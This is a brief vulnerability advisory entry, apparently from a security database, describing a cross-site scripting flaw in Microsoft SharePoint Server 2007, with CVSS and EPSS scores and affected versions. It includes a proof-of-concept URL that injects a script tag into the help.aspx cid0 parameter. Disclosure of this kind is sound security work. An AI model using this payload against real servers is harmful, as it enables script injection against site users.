4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
0.842 High
EPSS
Percentile
98.2%
High-Tech Bridge SA Security Research Lab has discovered vulnerability in Microsoft SharePoint Server 2007 which could be exploited to perform cross-site scripting attacks.
Exploitation example:
http://host/_layouts/help.aspx?cid0=MS.WSS.manifest.xml <script>alert% 28%27XSS%27%29%3C/script%3E&tid=X
CPE | Name | Operator | Version |
---|---|---|---|
microsoft sharepoint server 2007 | le | 12.0.0.6421 |